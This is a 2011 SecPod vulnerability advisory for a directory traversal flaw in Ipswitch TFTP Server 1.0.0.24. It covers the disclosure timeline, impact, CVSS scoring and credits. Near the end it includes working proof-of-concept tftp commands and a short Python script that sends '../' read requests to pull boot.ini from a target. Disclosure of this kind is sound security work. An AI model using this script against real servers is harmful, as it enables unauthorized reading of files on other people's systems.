Ipswitch TFTP Server 1.0.0.24 Directory Traversal

`##############################################################################  
# Title : Ipswitch TFTP Server Directory Traversal Vulnerability  
# Author : Prabhu S Angadi from SecPod Technologies (www.secpod.com)  
# Vendor : http://www.whatsupgold.com/index.aspx  
# Advisory : http://secpod.org/blog/?p=424  
# http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt  
# http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py  
# Version : Ipswitch TFTP Server 1.0.0.24  
# Date : 02/12/2011  
##############################################################################  
  
SecPod ID: 1028 13/09/2011 Issue Discovered  
04/10/2011 Vendor Notified  
No Response from Vendor  
02/12/2011 Advisory Released  
  
  
Class: Information Disclosure Severity: Medium  
  
  
Overview:  
---------  
Ipswitch TFTP Server 1.0.0.24 is prone to a directory traversal  
vulnerability.  
  
  
Technical Description:  
----------------------  
The vulnerability is caused due to improper validation to Read Request  
containing '../' sequences, which allows attackers to read arbitrary  
files.  
  
  
Impact:  
--------  
Successful exploitation could allow an attacker to obtain sensitive  
information.  
  
  
Affected Software:  
------------------  
Ipswitch TFTP Server 1.0.0.24  
  
  
Tested on:  
-----------  
Ipswitch TFTP Server 1.0.0.24 on Windows XP SP3 & Windows 7.  
  
  
References:  
-----------  
http://www.ipswitch.com/  
http://secpod.org/blog/?p=424  
http://www.whatsupgold.com/index.aspx  
http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt  
http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py  
  
  
Download Link:  
--------------  
http://www.whatsupgold.com/free-software/network-tools/tftp-server.aspx  
  
  
Proof of Concept:  
----------------  
tftp> get ../../../../../../../../../../../boot.ini  
tftp> get ../../../../../../../../../../../windows/win.ini  
  
  
Solution:  
----------  
Not available  
  
  
Risk Factor:  
-------------  
CVSS Score Report:  
ACCESS_VECTOR = NETWORK  
ACCESS_COMPLEXITY = LOW  
AUTHENTICATION = NOT_REQUIRED  
CONFIDENTIALITY_IMPACT = PARTIAL  
INTEGRITY_IMPACT = NONE  
AVAILABILITY_IMPACT = NONE  
EXPLOITABILITY = PROOF_OF_CONCEPT  
REMEDIATION_LEVEL = UNAVAILABLE  
REPORT_CONFIDENCE = CONFIRMED  
CVSS Base Score = 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N)  
CVSS Temporal Score = 4.5  
Risk factor = Medium  
  
  
Credits:  
--------  
Prabhu S Angadi of SecPod Technologies has been credited with the discovery of  
this vulnerability.  
  
  
POC :  
======  
import sys, socket  
  
def sendPacket(HOST, PORT, data):  
'''  
Sends UDP Data to a Particular Host on a Specified Port  
with a Given Data and Return the Response  
'''  
udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  
udp_sock.sendto(data, (HOST, PORT))  
data = udp_sock.recv(1024)  
udp_sock.close()  
return data  
  
if __name__ == "__main__":  
  
if len(sys.argv) < 2:  
print '\tUsage: python exploit.py target_ip'  
print '\tExample : python exploit.py 127.0.0.1'  
print '\tExiting...'  
sys.exit(0)  
  
HOST = sys.argv[1] ## The Server IP  
PORT = 69 ## Default TFTP port  
  
data = "\x00\x01" ## TFTP Read Request  
data += "../" * 10 + "boot.ini" + "\x00" ## Read boot.ini file using directory traversal  
data += "netascii\x00" ## TFTP Type  
  
## netascii  
rec_data = sendPacket(HOST, PORT, data)  
print "Data Found on the target : %s " %(HOST)  
print rec_data.strip()  
  
`